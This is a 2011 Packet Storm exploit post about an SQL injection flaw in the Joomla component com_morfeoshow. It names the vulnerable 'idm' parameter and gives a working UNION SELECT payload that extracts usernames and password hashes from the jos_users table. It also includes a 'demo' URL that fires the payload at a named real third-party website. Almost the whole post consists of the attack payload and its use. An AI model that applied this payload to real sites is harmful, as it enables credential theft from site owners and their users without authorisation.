Joomla Morfeoshow SQL Injection

2011-06-27T00:00:00
ID PACKETSTORM:102596
Type packetstorm
Reporter Th3.xin0x
Modified 2011-06-27T00:00:00

Description

                                        
                                            `#############################################################  
Joomla Component com_morfeoshow SQL Injection Vulnerability  
#############################################################  
  
  
# Author : Th3.xin0x  
  
# Greetz : P0fk - ksha - S[e]C -seth - pks - xacks - OzX All My Friends :)  
  
# special thanks to: www.mitm.cl - https://foro.undersecurity.net  
  
# Name : Joomla com_morfeoshow  
  
# Bug Type : SQL injection  
  
  
  
+--+ Example:  
site.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=  
  
  
+--+ EXPLOIT :  
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+  
  
  
+--+ DEmO  
  
http://www.ucinf.cl/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+  
  
  
[2011-06-26]  
`